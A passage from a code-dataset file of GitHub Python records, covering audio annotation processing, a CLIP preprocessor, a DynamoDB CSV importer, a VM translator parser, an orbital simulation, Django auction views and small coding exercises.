postprocess_fva():\n\n write_metadata = True\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v02'\n\n path = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v01_TableTemp.xlsx'\n df = pd.read_excel(path, keep_default_na=False, engine='openpyxl')\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Get Karl modifications\n path_karl = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v01_TableTemp_korr_KF.xlsx'\n df_karl = pd.read_excel(path_karl, keep_default_na=False, engine='openpyxl')\n df_karl = df_karl.sort_values(['filename', 'start_time']).reset_index(drop=True)\n \n df_diff = df.compare(df_karl)\n #print(df_diff)\n\n # Use karl modifications\n df = df_karl.copy()\n\n # Sanity checks \n for ix, row in df.iterrows():\n if row['end_time'] - row['start_time'] < 0.01:\n print('Warning end_time-start_time < 0.01', ix, row['filename'], row['start_time'], row['end_time'])\n if row['end_frequency'] and row['start_frequency'] and row['end_frequency'] - row['start_frequency'] < 10:\n print('Warning end_frequency-start_frequency < 10', ix, row['filename'], row['start_frequency'], row['end_frequency'])\n\n '''\n Warning end_time-start_time < 0.01 2963 44174_1_2020_06_23_FVA031_20200623_201930.WAV 314.3247 314.3247\n Warning end_frequency-start_frequency < 10 2963 44174_1_2020_06_23_FVA031_20200623_201930.WAV 6946.5 6946.5\n Warning end_time-start_time < 0.01 3002 44397_4_2020_06_01_FVA031_20200601_194506.WAV 372.3435 37.24712\n Warning end_time-start_time < 0.01 3007 44397_4_2020_06_19_FVA031_20200619_193349.WAV 244.5683 24.46741\n '''\n\n # 3002 & 3007 corrected manually in Scolopax_rusticola_FVA_v01_TableTemp_korr_KF.xlsx\n\n # Remove id=2963\n df = df.drop([2963]).reset_index(drop=True)\n\n\n # Set id=1 and background examples to id=2 ?\n df['id_level'] = 2\n df.loc[df['species_latin_name'] == 'Scolopax rusticola', 'id_level'] = 1\n\n\n # Write metadata\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n\n#postprocess_fva()\n\ndef postprocess_hakan_Crex_crex_Wellenberge_Lokalisation_2017():\n\n write_audio_files = False # True False\n write_metadata = True\n\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Crex_crex_Wellenberge_Lokalisation_2017_v02'\n\n path = root_dir + 'Annotationen/Crex_crex_Wellenberge/Crex_crex_Wellenberge_Lokalisation_2017_v1.xlsx'\n df = pd.read_excel(path, keep_default_na=False, engine='openpyxl')\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n #print(df)\n\n filenames = list(df['filename'].unique())\n n_files = len(filenames)\n\n audio_dst_dir = root_dir + 'Annotationen/Crex_crex_Wellenberge/_Segments/'\n \n counter = 0\n for filename in filenames:\n\n #if counter > 1: break\n\n path = df[df['filename']==filename].record_filepath.values[0]\n\n # with sf.SoundFile(path) as f:\n # duration = f.frames/f.samplerate\n\n # Extract channel 0\n channel_ix = 0\n if write_audio_files:\n write_part_of_audio_file(path, channel_ix=channel_ix, dst_dir=audio_dst_dir)\n\n # Update filename and path\n filename_new = filename + create_postfix_str(0) + '_c' + str(channel_ix)\n record_filepath_new = audio_dst_dir + filename_new + '.wav'\n df.loc[df['filename'] == filename, 'record_filepath'] = record_filepath_new\n df.loc[df['filename'] == filename, 'filename'] = filename_new\n \n\n\n print(filename)\n counter += 1\n \n # Update channel_ix=None (only one channel after selecting channel 0)\n df['channel_ix'] = None\n\n print(df)\n\n # Write metadata\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n#postprocess_hakan_Crex_crex_Wellenberge_Lokalisation_2017()\n\n\n\n\n\ndef concat_excel_annotations():\n\n write_metadata = True\n\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/AnnotationsInDbSoFar_v02'\n\n src_dir = root_dir + 'Annotationen/_MetadataReadyForDbInsert/'\n xlsx_files = [\n \"Crex_crex_Unteres_Odertal_2017_v02.xlsx\",\n \"Crex_crex_Wellenberge_Lokalisation_2017_v02.xlsx\",\n \"CrexCrex_LarsAnnotaions_v03.xlsx\",\n \"Scolopax_rusticola_ARSU_2021_v07.xlsx\",\n \"Scolopax_rusticola_ARSU_2022_v07.xlsx\",\n \"Scolopax_rusticola_FVA_v02.xlsx\",\n \"Scolopax_rusticola_MfN_Peenemuende+Schoenow_v04.xlsx\"\n ]\n \n df_list = []\n for file in xlsx_files:\n path = src_dir + file\n\n if not os.path.isfile(path):\n print(\"Error: File not found\", path)\n\n df = pd.read_excel(path, keep_default_na=False, engine=\"openpyxl\")\n df_list.append(df)\n\n df = pd.concat(df_list).reset_index(drop=True)\n #df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Drop some cols\n df = df.drop(columns=['record_filepath', 'collection_name', 'remarks', 'record_license', 'record_remarks', ])\n\n # Add split\n df['split'] = 'train'\n\n # Choose test split\n # Scolopax rusticola ARSU 2022 \n df.loc[(df['location_name'] == 'Gellener Torfmöörte') & (df['record_date'].str.startswith('2022-', na=False)), 'split'] = 'test'\n # Crex crex devise recordings ? --> To check if devise equipment was used\n df.loc[(df['location_name'] == 'Unteres Odertal') & (df['annotator_name'] == 'Beck, Lars'), 'split'] = 'test'\n\n\n cols = df.columns\n #print(cols)\n\n # print('location_name', list(df['location_name'].unique()))\n # print('annotator_name', list(df['annotator_name'].unique()))\n # print('noise_name', list(df['noise_name'].unique()))\n\n # Write metadata\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n#concat_excel_annotations()\n\n\nprint('Done.')","repo_name":"hdogan84/database","sub_path":"src/devise/01_1_process_collections_mario.py","file_name":"01_1_process_collections_mario.py","file_ext":"py","file_size_in_byte":59266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21233640060","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\n\nimport torch\nimport numpy as np\nimport youtokentome as yttm\nimport torchvision.transforms as T\nfrom torch.nn.utils.rnn import pad_sequence\n\n\nclass RuCLIPProcessor:\n eos_id = 3\n bos_id = 2\n unk_id = 1\n pad_id = 0\n\n def __init__(self, tokenizer_path, image_size=224, text_seq_length=77, mean=None, std=None):\n self.tokenizer = yttm.BPE(tokenizer_path)\n self.mean = mean or [0.48145466, 0.4578275, 0.40821073]\n self.std = std or [0.26862954, 0.26130258, 0.27577711]\n self.image_transform = T.Compose([\n T.Lambda(lambda img: img.convert('RGB') if img.mode != 'RGB' else img),\n T.RandomResizedCrop(image_size, scale=(1., 1.), ratio=(1., 1.)),\n T.ToTensor(),\n T.Normalize(mean=self.mean, std=self.std)\n ])\n self.text_seq_length = text_seq_length\n self.image_size = image_size\n\n def encode_text(self, text):\n text = text.lower()\n tokens = self.tokenizer.encode([text], output_type=yttm.OutputType.ID, dropout_prob=0.0)[0]\n tokens = tokens[:self.text_seq_length-2]\n tokens = [self.bos_id] + tokens + [self.eos_id]\n return self.prepare_tokens(tokens)\n\n def prepare_tokens(self, tokens):\n empty_positions = self.text_seq_length - len(tokens)\n if empty_positions > 0:\n tokens = np.hstack((tokens, np.zeros(empty_positions))) # position tokens after text\n if len(tokens) > self.text_seq_length:\n tokens = tokens[:self.text_seq_length-1] + tokens[-1:]\n return torch.tensor(tokens).long()\n\n def decode_text(self, encoded):\n return self.tokenizer.decode(encoded.cpu().numpy().tolist(), ignore_ids=[\n self.eos_id, self.bos_id, self.unk_id, self.pad_id\n ])[0]\n\n def __call__(self, text=None, images=None, **kwargs):\n inputs = {}\n if text is not None:\n input_ids = []\n texts = [text] if isinstance(text, str) else text\n for text in texts:\n tokens = self.encode_text(text)\n input_ids.append(tokens)\n inputs['input_ids'] = pad_sequence(input_ids, batch_first=True)\n if images is not None:\n pixel_values = []\n for i, image in enumerate(images):\n pixel_values.append(self.image_transform(image))\n inputs['pixel_values'] = pad_sequence(pixel_values, batch_first=True)\n return inputs\n\n @classmethod\n def from_pretrained(cls, folder):\n tokenizer_path = os.path.join(folder, 'bpe.model')\n config = json.load(open(os.path.join(folder, 'config.json')))\n image_size = config['image_resolution']\n text_seq_length = config['context_length']\n mean, std = config.get('mean'), config.get('std')\n return cls(tokenizer_path, image_size=image_size, text_seq_length=text_seq_length, mean=mean, std=std)\n","repo_name":"ai-forever/ru-clip","sub_path":"ruclip/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"53"} +{"seq_id":"17338641111","text":"\"\"\"\ncreated by Nagaj at 13/07/2021\n\"\"\"\n\n\ndef fib_three(a, b, c):\n def get_three(): # inner function\n # print(a, b, c)\n return a, b, c\n\n return get_three\n\n\nfunction = fib_three(4, 6, 7) # fib_three returns func obj\nprint(function)\n\nnumbers = function() # so, function obj can be callable. function() returns numbers\nprint(numbers)\na, *others = numbers # unpacking just 'a' and packing other numbers to 'others'\nprint(a)\nprint(others)\n","repo_name":"NagahShinawy/python-decorators","sub_path":"2-functions/2-function_within_function.py","file_name":"2-function_within_function.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13697739564","text":"\"\"\"Dynamo Example\"\"\"\n\nimport csv\nfrom pprint import pprint\nimport boto3\nimport threading\n\nsession = boto3.Session(profile_name=\"default\")\ndynamodb = session.resource('dynamodb', region_name='us-west-2')\n\ndef dynamo_create_table(table_name, key_schema, attribute_definitions):\n try:\n table = dynamodb.create_table(\n TableName=table_name,\n KeySchema=key_schema,\n AttributeDefinitions=attribute_definitions,\n ProvisionedThroughput={\n \"ReadCapacityUnits\": 5,\n \"WriteCapacityUnits\": 5,\n }\n )\n table.meta.client.get_waiter(\"table_exists\").wait(TableName=table_name)\n print(\"table created\")\n return True\n except Exception as e:\n print(e)\n return False\n\n\n\ndef import_data_multithreaded(filepath):\n print(\"opening file: %s\" % filepath)\n collection_name = filepath.split(\"/\")[-1].split(\".\")[0]\n print(\"creating collection: %s\" % collection_name)\n\n with open(filepath) as file:\n reader = csv.reader(file, delimiter=\",\")\n\n header = False\n for row in reader:\n if not header:\n header = [h for h in row]\n\n dynamo_create_table(\n collection_name,\n [\n {\n 'AttributeName': header[0],\n 'KeyType': 'HASH'\n }\n ],\n [\n {\n 'AttributeName': header[0],\n 'AttributeType': 'S'\n },\n ],\n )\n else:\n data = {\n header[column]:value \n for column, value in enumerate(row)\n }\n\n # {'Credit_limit': '237',\n # 'Email_address': 'Jessy@myra.net',\n # 'Home_address': '337 Eichmann Locks',\n # 'Id': 'C000000',\n # 'Last_name': 'Shanahan',\n # 'Name': 'Rickey',\n # 'Phone_number': '1-615-598-8649 x975',\n # 'Status': 'Active'\n\n try:\n dynamodb.Table(collection_name).put_item(\n Item=data\n )\n except Exception as e:\n print(e)\n\n # pprint(data)\n # break\n\n\n\n\n\nif __name__ == \"__main__\":\n files = [\n \"data/product.csv\",\n \"data/rental.csv\",\n \"data/customer.csv\",\n ]\n\n threads = []\n for filepath in files:\n thread = threading.Thread(\n target=import_data_multithreaded,\n args=(filepath,)\n )\n thread.start()\n threads.append(thread)\n\n # blocking\n for thread in threads:\n thread.join()\n\n\n # print(dynamodb.Table(\"product\").scan()[\"Items\"])\n\n\n print(\"goodbye\")\n\n","repo_name":"brydavis/rentals","sub_path":"src/dynamo.py","file_name":"dynamo.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37916452467","text":"def maxSubarraySumCircular(A):\n total, maxSum, curMax, minSum, curMin = 0, -float('inf'), 0,float('inf'),0\n for i in A:\n curMax=max(curMax+i,i)\n curMin =min(curMin+i,i)\n maxSum=max(maxSum,curMax)\n minSum=min(minSum,curMin)\n total+=i\n return max(maxSum,total-minSum) if maxSum >0 else maxSum\n\nprint(maxSubarraySumCircular([-1,-2,-3])) \n\n","repo_name":"Abhinav2903/foobarandleetccode","sub_path":"maxsumcisubarray.py","file_name":"maxsumcisubarray.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28133444287","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom .models import User, Auctions, Watchlist, Bids, Comments, History\nimport os\n\n\ndef create(request):\n if request.method == \"POST\" and request.user.is_authenticated:\n f = Auctions(\n name = request.POST[\"title\"],\n condition = request.POST[\"condition\"],\n description = request.POST[\"description\"],\n image = request.POST[\"image\"],\n availability = request.POST[\"quantity\"],\n start_bid = request.POST[\"start_bid\"],\n category = request.POST[\"category\"],\n user = User.objects.get(id = request.user.id)\n )\n f.save()\n return HttpResponseRedirect(reverse(\"item\", args=( f.id,) ))\n return render(request, \"auctions/create.html\", {\n \"categories\":return_categories(),\n \"conditions\":return_conditions()\n })\n\n\ndef item(request, item_id):\n item = Auctions.objects.filter(id = item_id).values().first()\n seller_id = item[\"user_id\"]\n seller = User.objects.filter(id = seller_id).values().first()['username']\n user_id = request.user.id\n\n try:\n comments = []\n for i in Comments.objects.filter(item = item_id).order_by(\"id\").values():\n dictionary = {}\n dictionary[\"username\"] = User.objects.filter(id = i[\"user_id\"]).values().first()[\"username\"]\n dictionary[\"comment\"] = i[\"comment\"]\n comments.append(dictionary)\n except:\n comments = [\"No comments yet\"]\n\n try:\n if item_id == Watchlist.objects.filter(item_id = item_id, user_id = user_id).values().first()[\"item_id\"]:\n watchlist_status = \"Remove from Watchlist\"\n except:\n watchlist_status = \"Add to Watchlist\"\n\n try:\n min_bid = item['buy_price']\n highest_bidder_id = item['buyer_id']\n highest_bidder = User.objects.filter(id = highest_bidder_id).values().first()[\"username\"]\n except:\n try:\n bid = Bids.objects.filter(item_id = item_id).order_by(\"-bid\").values().first()\n min_bid = bid['bid']\n highest_bidder_id = bid['user_id']\n highest_bidder = User.objects.filter(id = highest_bidder_id).values().first()[\"username\"]\n except:\n min_bid = item['start_bid']\n highest_bidder_id = \"\"\n highest_bidder = \"\"\n\n return render(request, \"auctions/item.html\", {\n \"item\":item,\n \"seller\":seller,\n \"watchlist\":watchlist_status,\n \"min_bid\":min_bid,\n \"highest_bidder_id\":highest_bidder_id,\n \"highest_bidder\":highest_bidder,\n \"comments\":comments,\n \"status\":item['status'],\n })\n\n\ndef bid(request, item_id):\n if request.method == \"POST\" and request.user.is_authenticated:\n user_id = request.user.id\n item_bids = []\n for i in Bids.objects.filter(user_id = user_id).values():\n item_bids.append(i['item_id'])\n if item_id in item_bids:\n b = Bids.objects.get(user_id = user_id, item_id = item_id)\n b.bid = request.POST[\"bid\"]\n b.save()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n b = Bids (\n user = User.objects.get(id = request.user.id),\n item = Auctions.objects.get(id = item_id),\n quantity = request.POST[\"quantity\"],\n bid = request.POST[\"bid\"]\n )\n b.save()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n\n\ndef change_watchlist(request, item_id):\n if request.method == \"POST\" and request.user.is_authenticated:\n user_id = request.user.id\n items_watchlist = set()\n try:\n for i in Watchlist.objects.filter(user_id = request.user.id).values():\n items_watchlist.add(i['item_id'])\n if item_id in items_watchlist:\n Watchlist.objects.filter(item_id = item_id, user_id = user_id).delete()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n except:\n pass\n w = Watchlist (\n item = Auctions.objects.get(id = item_id),\n user = User.objects.get(id = request.user.id)\n )\n w.save()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n\n\ndef close(request, item_id):\n bid = Bids.objects.filter(item_id = item_id)\n item = Auctions.objects.filter(id = item_id)\n\n if not bid:\n item.delete()\n\n try:\n buyer = bid.order_by(\"-bid\").values().first()['user_id']\n seller = item.values().first()['user_id']\n\n h = History(\n buyer = User.objects.get(id = buyer),\n seller = User.objects.get(id = seller),\n price = bid.order_by(\"-bid\").values().first()['bid'],\n quantity = bid.values().first()['quantity'],\n item = item.first()\n )\n h.save()\n\n if item.values().first()['availability'] == 1: \n item.update(status = 0, availability = 0)\n elif item.values().first()['availability'] > 1:\n availability = item.values().first()['availability']\n item.update(availability = availability - bid.values().first()['quantity'])\n \n bid.delete()\n Watchlist.objects.filter(item_id = item_id).delete()\n\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n except:\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef comment(request, item_id):\n if request.method == \"POST\":\n c = Comments (\n user = User.objects.get(id = request.user.id),\n item = Auctions.objects.get(id = item_id),\n comment = request.POST[\"comment\"]\n )\n c.save()\n return HttpResponseRedirect(reverse(\"item\", args=(item_id,)))\n\n\n#### Functions rendered by aux function show ####\n\n\ndef show(request, items, pagename):\n try:\n return render(request, \"auctions/show.html\", {\n \"items\":items,\n \"pagename\":pagename\n })\n except:\n return render(request, \"auctions/show.html\", {\n \"items\":[],\n \"pagename\":pagename\n }) \n\n\ndef index(request):\n return show(request, Auctions.objects.filter(status = 1).values(), \"Active Listings\") \n\n\ndef mylistings(request):\n if request.user.is_authenticated:\n return show(request, Auctions.objects.filter(status = 1, user_id = request.user.id).values(), \"My Active Listings\")\n \n \ndef watchlist(request):\n items = []\n for i in Watchlist.objects.filter(user_id = request.user.id).values():\n items.append(Auctions.objects.filter(id = i[\"item_id\"]).values().first())\n return show(request, items, \"Watchlist\")\n\n\n#### Functions rendered by aux function show_hist ####\n\n\ndef show_hist(request, items, pagename, side):\n try:\n return render(request, \"auctions/history.html\", {\n \"items\":items,\n \"pagename\":pagename,\n \"side\":side\n })\n except:\n return render(request, \"auctions/history.html\", {\n \"items\":[],\n \"pagename\":pagename,\n \"side\":side\n }) \n\n\ndef buy_history(request):\n if request.user.is_authenticated:\n buy_sell_side = True\n \n items = []\n for item in History.objects.filter(buyer = request.user.id).values():\n li = Auctions.objects.filter(id = item['item_id']).values().first()\n li['buyer_username'] = User.objects.filter(id = item['buyer_id']).values().first()['username']\n li['seller_username'] = User.objects.filter(id = item['seller_id']).values().first()['username']\n li['price'] = item['price']\n li['quantity'] = item['quantity']\n items.append(li)\n return show_hist(request, items, \"Buy History\", buy_sell_side)\n\n\ndef sell_history(request):\n if request.user.is_authenticated:\n buy_sell_side = False\n\n items = []\n for item in History.objects.filter(seller = request.user.id).values():\n li = Auctions.objects.filter(id = item['item_id']).values().first()\n li['buyer_username'] = User.objects.filter(id = item['buyer_id']).values().first()['username']\n li['seller_username'] = User.objects.filter(id = item['seller_id']).values().first()['username']\n li['price'] = item['price']\n li['quantity'] = item['quantity']\n items.append(li)\n return show_hist(request, items, \"Sell History\", buy_sell_side)\n\n\n#### Category related ####\n\n\ndef categories(request):\n return render(request, \"auctions/categories.html\",{\n \"categories\":return_categories()\n })\n\n\ndef category(request, category):\n items = []\n for i in Auctions.objects.filter(category=category, status = 1).values():\n items.append(i)\n return render(request, \"auctions/category.html\", {\n \"items\":items,\n \"category\":category\n })\n\n\n### Get starting functions ###\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n\n # Ensure password matches confirmation\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n\n## Auxiliary functions ##\n\n\ndef return_categories():\n path = os.getcwd()\n file_dir = path + \"\\\\categories.txt\"\n f = open(file_dir, \"r\").read()\n categories = f.split(\"\\n\")\n return categories\n\n\ndef return_conditions():\n path = os.getcwd()\n file_dir = path + \"\\\\conditions.txt\"\n f = open(file_dir, \"r\").read()\n conditions = f.split(\"\\n\")\n return conditions\n","repo_name":"brunnorpdias/CS50W","sub_path":"project_2/commerce/auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17195855977","text":"from collections import deque\nfrom re import L\nimport sys\n\ninput = sys.stdin.readline\nstring = str(input())\nn = int(input())\n\nleft = list(string)[:-1]\nright = deque()\n\nfor _ in range(n):\n ins = list(map(str, input().split()))\n\n if len(ins) == 2:\n left.append(ins[1])\n else:\n if ins[0] == \"L\":\n if len(left) > 0:\n right.insert(0, left.pop())\n elif ins[0] == \"D\":\n if len(right) > 0:\n left.append(right.popleft())\n elif ins[0] == \"B\":\n if len(left) > 0:\n left.pop()\n\nresult = \"\"\nfor l in left:\n result += l\nfor r in right:\n result += r\nprint(result)","repo_name":"JungWooGeon/BAEKJOON","sub_path":"1406.py","file_name":"1406.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13661343923","text":"import enum\n\n\nclass Command(enum.Enum):\n C_ARITHMETIC = 1\n C_PUSH = 2\n C_POP = 3\n C_LABEL = 4\n C_GOTO = 5\n C_IF = 6\n C_FUNCTION = 7\n C_RETURN = 8\n C_CALL = 9\n\n\nclass Parser:\n \"\"\"\n handles the parsing of a single .vm file; reads a vm command, parses the\n command into its lexical components, and provides convenient access to\n said components. ignores all whitespace and comments\n \"\"\"\n\n def __init__(self, filename):\n \"\"\"\n opens a .vm file and saves all vm commands for later processing but\n does not include comments or whitespace\n :param filename:\n \"\"\"\n\n vm_file = open(filename, 'r')\n lines = vm_file.readlines()\n self.vm_commands = []\n self.commandIndex = -1 # current command index;\n self.currentCommand = None # initially there is no current command\n\n for line in lines:\n # ignore whitespace\n if line == '\\n':\n continue\n\n # ignore entire-line comments\n if line[0] == '/' and line[1] == '/':\n continue\n\n # ignore mid-line comments\n try:\n index = line.index('//')\n line = line[0:index]\n except ValueError:\n # '//' wasn't found!\n pass\n\n # strip whitespace\n line = line.strip()\n\n self.vm_commands.append(line)\n\n\n def command(self) -> str:\n \"\"\"\n returns the current VM command\n \"\"\"\n return self.currentCommand\n\n\n def hasMoreCommands(self) -> bool:\n \"\"\"\n :return: true if the parser contains more commands to be parsed\n \"\"\"\n return self.commandIndex < len(self.vm_commands) - 1\n\n\n def advance(self) -> None:\n \"\"\"\n goes to the next vm command if there are any\n \"\"\"\n self.commandIndex += 1\n self.currentCommand = self.vm_commands[self.commandIndex]\n\n\n def commandType(self) -> Command:\n \"\"\"\n :return: a Command enumeration corresponding to the command type of\n the current vm command\n \"\"\"\n\n current = self.command()\n tokens = current.split()\n\n command_name = tokens[0]\n arithmetic = ['add', 'sub', 'neg', 'eq', 'gt', 'lt', 'and', 'or', 'not']\n\n if command_name in arithmetic:\n return Command.C_ARITHMETIC\n\n if command_name == 'pop':\n return Command.C_POP\n\n if command_name == 'push':\n return Command.C_PUSH\n\n raise ValueError(f'VM command not recognized: {self.command()}')\n\n\n def arg1(self) -> str:\n # TODO check: don't call if c_return\n return self.command().split()[1]\n\n\n def arg2(self) -> str:\n # TODO check: call only if current command is push, pop, function, call\n return self.command().split()[2]\n","repo_name":"kiwi-fruitiwi/py-vmTranslator","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24506533424","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nplt.style.use('dark_background')\n\nclass Body:\n def __init__(self, mass, position, velocity, color):\n self.mass = mass # mass of the body\n self.position = np.array(position, dtype='float64') # initial position of the body in the space\n self.velocity = np.array(velocity, dtype='float64') # initial velocity of the body\n self.color = color # color of the body in the plot\n\n# Define gravitational constant\nG = 6.67430e-11 # m^3 kg^-1 s^-2\n\n# Define bodies in the solar system\n# Positions and velocities are set so that the planets start at the positive x-axis and move in the positive y-direction\nsun = Body(1.989e30, [0, 0, 0], [0, 0, 0], 'orange')\n# sun = Body(1.989e30, [0, 0, 0], [0, 0, 0], 'orange', 'Sun', fixed=False)\nearth = Body(5.972e24, [1.496e11, 0, 0], [0, 2.9783e4, 0], 'blue')\nmoon = Body(7.342e22, [1.496e11, 3.844e8, 0], [1.022e3, 2.9783e4, 0], 'grey')\nmercury = Body(3.301e23, [5.791e10, 0, 0], [0, 4.736e4, 0], 'yellow')\nvenus = Body(4.867e24, [1.082e11, 0, 0], [0, 3.502e4, 0], 'green')\nmars = Body(6.417e23, [2.279e11, 0, 0], [0, 2.407e4, 0], 'red')\njupiter = Body(1.899e27, [7.785e11, 0, 0], [0, 1.307e4, 0], 'orange')\nsaturn = Body(5.685e26, [1.434e12, 0, 0], [0, 9.68e3, 0], 'goldenrod')\nuranus = Body(8.682e25, [2.871e12, 0, 0], [0, 6.8e3, 0], 'lightblue')\nneptune = Body(1.024e26, [4.495e12, 0, 0], [0, 5.43e3, 0], 'blue')\n\n# Put the bodies in a list\nbodies = [\n sun\n , mercury\n , venus\n , earth\n , moon\n , mars\n # , jupiter\n # , saturn\n # , uranus\n # , neptune\n ]\n\nsize_dict = {\n sun: 20,\n mercury: 10,\n venus: 10,\n earth: 10,\n moon: 5,\n mars: 10,\n jupiter: 15,\n saturn: 14,\n uranus: 13,\n neptune: 12\n}\n\n\n\n# Define a function that will compute the derivatives of the position and velocity\ndef compute_derivatives(y, t, bodies):\n n = len(bodies)\n result = np.zeros((n, 6))\n positions = y.reshape(n, 6)\n\n # Loop over all bodies and calculate the acceleration due to all other bodies\n for i in range(n):\n body1 = bodies[i]\n r1 = positions[i, :3]\n v1 = positions[i, 3:]\n \n a = np.zeros(3) # acceleration\n for j in range(n):\n if i != j:\n body2 = bodies[j]\n r2 = positions[j, :3]\n r = np.linalg.norm(r2 - r1)\n a += G * body2.mass * (r2 - r1) / r**3\n\n result[i, :3] = v1 # derivative of position is velocity\n result[i, 3:] = a # derivative of velocity is acceleration\n\n return result.reshape(6*n)\n\n# Combine all the positions and velocities into a single array to use as initial conditions\ny0 = np.zeros((len(bodies), 6))\nfor i, body in enumerate(bodies):\n y0[i, :3] = body.position\n y0[i, 3:] = body.velocity\ny0 = y0.reshape(6*len(bodies))\n\n# Define the times for which we want the solution: from t=0 to t=3.154e7 (1 year) with 2000 points in-between\n# t = np.linspace(0, 3.154e7, 12)\nt = np.linspace(0, 10 * 3.154e7, 3650)\n\n# Solve the system of differential equations\nsolution = odeint(compute_derivatives, y0, t, args=(bodies,))\n\nmax_distance = max(np.linalg.norm(body.position) for body in bodies)\n\n\n# Set up the figure with a specific size (10x10 in this case)\nfig, ax = plt.subplots(figsize=(10, 10)) # You can adjust the size to fit your needs\nax.set_xlim(-max_distance*1.2, max_distance*1.2)\nax.set_ylim(-max_distance*1.2, max_distance*1.2)\nax.set_aspect('equal', adjustable='box')\n\ntime_text = ax.text(0.02, 0.95, '', transform=ax.transAxes)\n\n# Create a plot object for each body and a trail (line) for each body\npoints = [plt.plot([], [], color=body.color, marker='o', markersize=size_dict.get(body, 10))[0] for body in bodies]\nlines = [plt.plot([], [], color=body.color)[0] for body in bodies]\n\n# Initialize the plot objects\ndef init():\n for point, line in zip(points, lines):\n point.set_data([], [])\n line.set_data([], [])\n \n time_text.set_text('') # Set the initial timestamp to empty\n return points + lines + [time_text] # Add time_text to the returned objects\n\n# Update function to draw each frame in the animation\ndef update(i):\n year = i // 12 # Calculate the current year\n\n # Update the time legend\n time_text.set_text('Year: {}'.format(year))\n\n for j, (point, line) in enumerate(zip(points, lines)):\n x = solution[:i+1, j*6]\n y = solution[:i+1, j*6+1]\n point.set_data(x[-1], y[-1]) # update the position of the body in the current frame\n line.set_data(x, y) # update the trail of the body with all previous positions\n return points + lines + [time_text] # Add time_text to the returned objects\n\n\n# Create an animation\nani = FuncAnimation(fig, update, frames=range(0, len(t), 1), init_func=init, blit=True)\n\nplt.show() # display the animation\n","repo_name":"deanosmith/Astro","sub_path":"solar_system/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33877422915","text":"\"\"\"\n 2020 Department of Information Engineering and Mathematics, University of Siena, Italy.\n\n Authors: Andrea Costanzo (andreacos82@gmail.com) and Benedetta Tondi\n\n This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public\n License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later\n version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the\n implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for\n more details. You should have received a copy of the GNU General Public License along with this program.\n If not, see .\n\n If you are using this software, please cite:\n\n Boosting CNN-based primary quantization matrix 